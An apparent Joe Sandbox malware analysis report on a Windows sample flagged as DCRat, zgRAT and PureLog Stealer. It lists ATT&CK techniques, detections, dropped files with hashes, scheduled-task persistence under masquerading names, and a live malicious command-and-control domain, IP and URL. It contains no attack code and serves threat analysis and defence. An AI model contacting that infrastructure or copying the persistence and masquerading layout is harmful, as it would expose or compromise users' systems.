                                Command and Scripting Interpreter
                                Logon Script (Windows)12
                                Process Injection
                                3
                                Obfuscated Files or Information
                                Security Account Manager137
                                System Information Discovery
                                SMB/Windows Admin SharesData from Network Shared Drive12
                                Application Layer Protocol
                                Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook13
                                Software Packing
                                NTDS221
                                Security Software Discovery
                                Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                                Timestomp
                                LSA Secrets1
                                Process Discovery
                                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                                DLL Side-Loading
                                Cached Domain Credentials131
                                Virtualization/Sandbox Evasion
                                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items233
                                Masquerading
                                DCSync1
                                Application Window Discovery
                                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job131
                                Virtualization/Sandbox Evasion
                                Proc Filesystem1
                                Remote System Discovery
                                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                                Process Injection
                                /etc/passwd and /etc/shadow1
                                System Network Configuration Discovery
                                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                [Behavior graph] ID: 1582993, Sample: QH67JSdZWl.exe, Startdate: 01/01/2025, Architecture: WINDOWS, Score: 100; contacted host: 487997cm.renyash.top (185.158.202.52, PREVIDER-ASNL, Netherlands)

                                SourceDetectionScannerLabelLink
                                QH67JSdZWl.exe44%VirustotalBrowse
                                QH67JSdZWl.exe61%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                QH67JSdZWl.exe100%Joe Sandbox ML

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\z0MvDYgz73.bat | 100% | Avira | BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe | 100% | Avira | VBS/Runner.VPG
C:\mshypercomponentSavesdll\agentFont.exe | 100% | Avira | HEUR/AGEN.1339906
C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe | 100% | Avira | HEUR/AGEN.1339906
C:\Program Files (x86)\Microsoft.NET\RuntimeBroker.exe | 100% | Avira | HEUR/AGEN.1339906
C:\Recovery\ApplicationFrameHost.exe | 100% | Avira | HEUR/AGEN.1339906
C:\mshypercomponentSavesdll\kNSe5xQ3wI9ft6pWJZ9EeFYPDfgbdbVMsQk13JHxpBJ7xdPC40.vbe | 100% | Avira | VBS/Runner.VPG
C:\Users\user\Desktop\cvxIvGPF.log | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\kZFyeAfm.log | 100% | Joe Sandbox ML |
C:\mshypercomponentSavesdll\agentFont.exe | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\AnJfWYZZ.log | 100% | Joe Sandbox ML |
C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Microsoft.NET\RuntimeBroker.exe | 100% | Joe Sandbox ML |
C:\Recovery\ApplicationFrameHost.exe | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\rEqPmwUs.log | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Microsoft.NET\RuntimeBroker.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Program Files\Adobe\Acrobat DC\Resource\RuntimeBroker.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Recovery\ApplicationFrameHost.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe | 83% | ReversingLabs | Win32.Trojan.Uztuby
C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\mf04Loader.dll | 0% | ReversingLabs |
C:\Users\user\Desktop\AnJfWYZZ.log | 9% | ReversingLabs |
C:\Users\user\Desktop\HOfmkikL.log | 25% | ReversingLabs |
C:\Users\user\Desktop\HhjUFBqv.log | 25% | ReversingLabs |
C:\Users\user\Desktop\cvxIvGPF.log | 8% | ReversingLabs |
C:\Users\user\Desktop\kZFyeAfm.log | 9% | ReversingLabs |
C:\Users\user\Desktop\rEqPmwUs.log | 8% | ReversingLabs |
C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\mshypercomponentSavesdll\DONEBnCAFZiOynZWpVVmZLvNQeA.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\mshypercomponentSavesdll\agentFont.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat

                                No Antivirus matches
                                No Antivirus matches

Source | Detection | Scanner | Label
http://487997cm.renyash.top/VideoFlowergeneratorTestpublic.php | 100% | Avira URL Cloud | malware
http://www.w3. | 0% | Avira URL Cloud | safe

Name | IP | Active | Malicious | Antivirus Detection | Reputation
487997cm.renyash.top | 185.158.202.52 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
http://487997cm.renyash.top/VideoFlowergeneratorTestpublic.php | false | Avira URL Cloud: malware | unknown

IP | Domain | Country | ASN | ASN Name | Malicious
185.158.202.52 | 487997cm.renyash.top | Netherlands | 20847 | PREVIDER-ASNL | true

                                                              Joe Sandbox version:41.0.0 Charoite
                                                              Analysis ID:1582993
                                                              Start date and time:2025-01-01 11:26:08 +01:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 10m 37s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Number of analysed new started processes analysed:54
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:QH67JSdZWl.exe
                                                              renamed because original name is a hash value
                                                              Original Sample Name:c8228b107dfad48c1a7de8147fa1f6e4.exe
                                                              Detection:MAL
                                                              Classification:mal100.troj.expl.evad.winEXE@43/52@2/1
                                                              EGA Information:
                                                              • Successful, ratio: 23.1%
                                                              HCA Information:
                                                              • Successful, ratio: 73%
                                                              • Number of executed functions: 193
                                                              • Number of non-executed functions: 170
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe
                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, schtasks.exe, ApplicationFrameHost.exe
                                                              • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.45
                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                              • Execution Graph export aborted for target DONEBnCAFZiOynZWpVVmZLvNQeA.exe, PID 7984 because it is empty
                                                              • Execution Graph export aborted for target DONEBnCAFZiOynZWpVVmZLvNQeA.exe, PID 8016 because it is empty
                                                              • Execution Graph export aborted for target agentFont.exe, PID 7696 because it is empty
                                                              • Execution Graph export aborted for target agentFont.exe, PID 7832 because it is empty
                                                              • Execution Graph export aborted for target powershell.exe, PID 7284 because it is empty
                                                              • Execution Graph export aborted for target powershell.exe, PID 7292 because it is empty
                                                              • Execution Graph export aborted for target powershell.exe, PID 7308 because it is empty
                                                              • Execution Graph export aborted for target powershell.exe, PID 7328 because it is empty
                                                              • Execution Graph export aborted for target powershell.exe, PID 7352 because it is empty
                                                              • Execution Graph export aborted for target powershell.exe, PID 7376 because it is empty
                                                              • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.

Time | Type | Description
05:27:05 | API Interceptor | 211x Sleep call for process: powershell.exe modified
05:27:17 | API Interceptor | 3637878x Sleep call for process: agentFont.exe modified
10:27:03 | Task Scheduler | Run new task: agentFont path: "C:\mshypercomponentSavesdll\agentFont.exe"
10:27:03 | Task Scheduler | Run new task: agentFonta path: "C:\mshypercomponentSavesdll\agentFont.exe"
10:27:04 | Task Scheduler | Run new task: ApplicationFrameHost path: "C:\Recovery\ApplicationFrameHost.exe"
10:27:04 | Task Scheduler | Run new task: ApplicationFrameHostA path: "C:\Recovery\ApplicationFrameHost.exe"
10:27:04 | Task Scheduler | Run new task: DONEBnCAFZiOynZWpVVmZLvNQeA path: "C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe"
10:27:04 | Task Scheduler | Run new task: DONEBnCAFZiOynZWpVVmZLvNQeAD path: "C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe"
10:27:05 | Task Scheduler | Run new task: RuntimeBroker path: "C:\Program Files\Adobe\Acrobat DC\Resource\RuntimeBroker.exe"
10:27:05 | Task Scheduler | Run new task: RuntimeBrokerR path: "C:\Program Files\Adobe\Acrobat DC\Resource\RuntimeBroker.exe"

                                                              No context
                                                              No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
PREVIDER-ASNL | kWZnXz2Fw7.elf | malicious | Mirai | 84.241.133.1
PREVIDER-ASNL | aQvU3QHA3N.elf | malicious | Unknown | 62.165.97.41
PREVIDER-ASNL | loligang.arm7.elf | malicious | Mirai | 84.241.184.118
PREVIDER-ASNL | http://maritimecybersecurity.nl | malicious | Unknown | 31.7.2.29
PREVIDER-ASNL | 21y8z80div.elf | malicious | Mirai | 80.65.103.15
PREVIDER-ASNL | botx.arm7.elf | malicious | Mirai | 84.241.184.103
PREVIDER-ASNL | BLBq6xYqWy.elf | malicious | Mirai | 80.65.126.250
PREVIDER-ASNL | https://expressinvoice.mijnparagon-cc.nl/ | malicious | Unknown | 84.241.158.7
PREVIDER-ASNL | https://expressinvoice.mijnparagon-cc.nl/ | malicious | Unknown | 84.241.158.7
PREVIDER-ASNL | UiuZNHab2t.elf | malicious | Mirai | 62.165.71.164

                                                              No context

Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\Desktop\AnJfWYZZ.log | Etqq32Yuw4.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\AnJfWYZZ.log | KzLetzDiM8.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\AnJfWYZZ.log | f3I38kv.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\AnJfWYZZ.log | XNPOazHpXF.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\AnJfWYZZ.log | 9FwQYJSj4N.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\AnJfWYZZ.log | CPNSQusnwC.exe | malicious | DCRat
C:\Users\user\Desktop\AnJfWYZZ.log | file.exe | malicious | Amadey, DCRat, DarkVision Rat, LummaC Stealer, Stealc, Vidar
C:\Users\user\Desktop\AnJfWYZZ.log | file.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\AnJfWYZZ.log | hjgesadfseawd.exe | malicious | DCRat
C:\Users\user\Desktop\AnJfWYZZ.log | adjthjawdth.exe | malicious | DCRat

                                                                                  Process:C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  File Type:ASCII text, with very long lines (602), with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):602
                                                                                  Entropy (8bit):5.848218281199536
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:m2kl1xVE/DvdxnwuT2gqr4Db4ywvZGfl+IjDCg9CdRPjqL:BJbHwuagN90Gd4PjqL
                                                                                  MD5:6F5F499D50D2B07809949BF20BAE9C57
                                                                                  SHA1:6469A3D6B6E99A0720081DAA8921491CDBB55DC4
                                                                                  SHA-256:B789BDE69565E67E2CEB4BC23C563C5C8D27DF20F7000EF6F3973DBDCC3A40C9
                                                                                  SHA-512:FE03548F50A227CDEE9909E75AE4D4DF1435855C3E3B97038BA3A64433FED6D4237872D3E24EBF0E2D5CDED4286F48C54150BB2B533F3BC1D1D72FDF4F282330
                                                                                  Malicious:false
                                                                                  Process:C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):3284992
                                                                                  Entropy (8bit):4.694992410471207
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:sW0xzjWom1zfPkDpxnY/Pfo5kC4R1xyPKTRa/wtVM1Mez3VXFu5Yx3:sZafWppGQ54yoRdez3VVu5Yx
                                                                                  MD5:0D30B2D3FD8DB7AE5EDC0455DA8DC8E9
                                                                                  SHA1:16DB688EB2B4E8B465AB18587FFB65EDD639B989
                                                                                  SHA-256:23DFBD08FCA53DCB25B0F76B6D24ABF02EB2349BC43C975BACD3776B52241FAF
                                                                                  SHA-512:0F15D35FF2821BA43A21C036C5DB79AE52FDF69681EBB64ED80F963A923346FE7466AD39351A2110E119AD16DCC4B30FBBC61950C6D3B115A6816CD770B028C4
                                                                                  Malicious:true
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Microsoft.NET\RuntimeBroker.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Microsoft.NET\RuntimeBroker.exe, Author: Joe Security
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                                  Process:C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  File Type:ASCII text, with very long lines (538), with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):538
                                                                                  Entropy (8bit):5.868311608471381
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TrnYnWKgeLObtsx527DzcimXQ9Pg7fVZ1ql0lIgU9Ig3wKtAsUVxjyS:3QWK+BsveZIj1q4IWghijZ1
                                                                                  MD5:67065A3C6F53B886BFC0F23689039505
                                                                                  SHA1:76F62D89C324750FCAE13D223BD7046FC98CC1BD
                                                                                  SHA-256:F86B3681361BBCEC17919F83E5ADDDD647C529B2C3F07C70B5E375D6520C149A
                                                                                  SHA-512:CAD984F2A375F9A1E2D0DA225DED87A1E07A0153AA36FFE7256F8DF1C7748CAA2D30A5A211BD27B3D46E88C0ED0AD06299A3DDC6E5F08FE022066FCC634DCD01
                                                                                  Malicious:false
                                                                                  Process:C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):3284992
                                                                                  Entropy (8bit):4.694992410471207
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:sW0xzjWom1zfPkDpxnY/Pfo5kC4R1xyPKTRa/wtVM1Mez3VXFu5Yx3:sZafWppGQ54yoRdez3VVu5Yx
                                                                                  MD5:0D30B2D3FD8DB7AE5EDC0455DA8DC8E9
                                                                                  SHA1:16DB688EB2B4E8B465AB18587FFB65EDD639B989
                                                                                  SHA-256:23DFBD08FCA53DCB25B0F76B6D24ABF02EB2349BC43C975BACD3776B52241FAF
                                                                                  SHA-512:0F15D35FF2821BA43A21C036C5DB79AE52FDF69681EBB64ED80F963A923346FE7466AD39351A2110E119AD16DCC4B30FBBC61950C6D3B115A6816CD770B028C4
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                                  Process:C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  File Type:ASCII text, with very long lines (629), with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):629
                                                                                  Entropy (8bit):5.892149818729766
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:r8GoxMUJArWHJDE5KsGc0pAZe5vPrePnFegrSppX0H5olhAJVvx:r8GrwK9xmPry8gYaH5Y6JVp
                                                                                  MD5:5F65F46A650054AD3A52F19E0320D855
                                                                                  SHA1:262F76293ABA34FDAB15BBD27F8720174F8A91D4
                                                                                  SHA-256:F0580BD17D9E3899754918D40B81F80D9BBC1596F5F1E9A27A8AE344895D14C0
                                                                                  SHA-512:6D664663FEA4E68C652F9D1AFEB4310EEBF86432903B4A54719F4552EF72EA58F7172408D53C336C060B097058B5E665078A9318194D839B049E44F8D5549DAE
                                                                                  Malicious:false
                                                                                  Process:C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):3284992
                                                                                  Entropy (8bit):4.694992410471207
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:sW0xzjWom1zfPkDpxnY/Pfo5kC4R1xyPKTRa/wtVM1Mez3VXFu5Yx3:sZafWppGQ54yoRdez3VVu5Yx
                                                                                  MD5:0D30B2D3FD8DB7AE5EDC0455DA8DC8E9
                                                                                  SHA1:16DB688EB2B4E8B465AB18587FFB65EDD639B989
                                                                                  SHA-256:23DFBD08FCA53DCB25B0F76B6D24ABF02EB2349BC43C975BACD3776B52241FAF
                                                                                  SHA-512:0F15D35FF2821BA43A21C036C5DB79AE52FDF69681EBB64ED80F963A923346FE7466AD39351A2110E119AD16DCC4B30FBBC61950C6D3B115A6816CD770B028C4
                                                                                  Malicious:true
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\ApplicationFrameHost.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\ApplicationFrameHost.exe, Author: Joe Security
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                                  Process:C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe
                                                                                  File Type:CSV text
                                                                                  Category:dropped
                                                                                  Size (bytes):847
                                                                                  Entropy (8bit):5.354334472896228
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                  MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                  SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                  SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                  SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                  Malicious:false
                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                                                  Process:C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  File Type:CSV text
                                                                                  Category:dropped
                                                                                  Size (bytes):1306
                                                                                  Entropy (8bit):5.353303787007226
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUN+E4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKk+HKlT4T
                                                                                  MD5:BD55EA7BCC4484ED7DE5C6F56A64EF15
                                                                                  SHA1:76CBF3B5E5A83EC67C4381F697309877F0B20BBE
                                                                                  SHA-256:81E0A3669878ED3FFF8E565607FB86C5478D7970583E7010D191A8BC4E5066B6
                                                                                  SHA-512:B50A3F8F5D18D3F1C85A6A5C9A46258B1D6930B75C847F0FB6E0A7CD0627E4690125BB3171A2D6554DEBE240ADAB2FF23ABDECA9959357B48089CFBF1F0D9FD8
                                                                                  Malicious:false
                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\Syste
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:modified
                                                                                  Size (bytes):64
                                                                                  Entropy (8bit):1.1940658735648508
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Nlllulbnolz:NllUc
                                                                                  MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                                                  SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                                                  SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                                                  SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                                                  Malicious:false
                                                                                  Preview:@...e................................................@..........
                                                                                  Process:C:\Users\user\Desktop\QH67JSdZWl.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):3568371
                                                                                  Entropy (8bit):4.915055948000566
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:hTbBv5rUlGjW0xzjWom1zfPkDpxnY/Pfo5kC4R1xyPKTRa/wtVM1Mez3VXFu5YxW:rB7jZafWppGQ54yoRdez3VVu5YxW
                                                                                  MD5:FEB773E3FB046E0D1F39450C703492CA
                                                                                  SHA1:282CB72366FD980F7AD022F0BD5B3B712696256C
                                                                                  SHA-256:6F91BDCD3C2805D9D4A8577E58E6C5B4B09C05316FB2D30DA531DD2422A7CAE1
                                                                                  SHA-512:CCCCB9EBB22C947A769B1472F7D7C8162115BF326D9F91A5A000A7854B9E211B22A4EC2E12DC7C66453FCFC316831140A28FF4E5509720C72DB1D523641A9055
                                                                                  Malicious:true
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe, Author: Joe Security
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                                  Process:C:\Users\user\Desktop\QH67JSdZWl.exe
                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):120432
                                                                                  Entropy (8bit):6.602841735473839
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:R9TXF5YXWbj8qr51XlN+dULTCe1IGhKWyxLiyaXYaWEoecbdhUoTtHez9FazR:REnsvReGsWyxLizXFCecbd1Tt+i1
                                                                                  MD5:943FC74C2E39FE803D828CCFA7E62409
                                                                                  SHA1:4E55D591111316027AE4402DFDFCF8815D541727
                                                                                  SHA-256:DA72E6677BD1BCD01C453C1998AAA19AEAF6659F4774CF6848409DA8232A95B2
                                                                                  SHA-512:96E9F32E89AEE6FAEA6E5A3EDC411F467F13B35EE42DD6F071723DAEBA57F611DBD4FF2735BE26BB94223B5EC4EE1DFFEDF8DC744B936C32A27D17B471E37DCF
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
